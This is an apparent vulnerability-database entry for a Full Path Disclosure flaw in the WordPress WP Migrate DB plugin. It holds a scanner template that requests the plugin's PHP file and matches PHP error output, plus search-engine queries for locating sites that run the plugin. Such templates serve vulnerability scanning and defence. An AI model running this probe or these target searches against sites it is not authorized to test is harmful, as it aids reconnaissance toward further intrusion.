wp-migrate-db-fpd: WordPress WP Migrate DB - Full Path Disclosure

2026-01-08 WordPress WP Migrate DB PoC Public

Description

The WP Migrate DB (WP Migrate Lite - WordPress Migration Made Easy) plugin for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.

PoC

id: wp-migrate-db-fpd

info:
  name: WordPress WP Migrate DB - Full Path Disclosure
  author: pussycat0x
  severity: low
  description: |
    The WP Migrate DB (WP Migrate Lite - WordPress Migration Made Easy) plugin for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
  reference:
    - https://wordpress.org/plugins/wp-migrate-db/
  metadata:
    max-request: 1
    publicwww-query: "/wp-content/plugins/wp-migrate-db/"
    fofa-query: body="/wp-content/plugins/wp-migrate-db/"
  tags: wordpress,wp,wp-plugin,fpd,wp-migrate-db,wpmdb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-migrate-db/wp-migrate-db.php"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:", "failed to open stream")'
          - 'status_code == 200 || status_code == 500'
          - 'contains(body, "wp-migrate-db")'
        condition: and
# digest: 4b0a00483046022100cc79cb19645a6b3f8abef342b10081fc1671977ee2be836994cfaf6af5147ff10221008f50a1019e7c794fbec1aa0537ca3c0f1a259fb8ac6092cdeed1b01d800b84fc:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities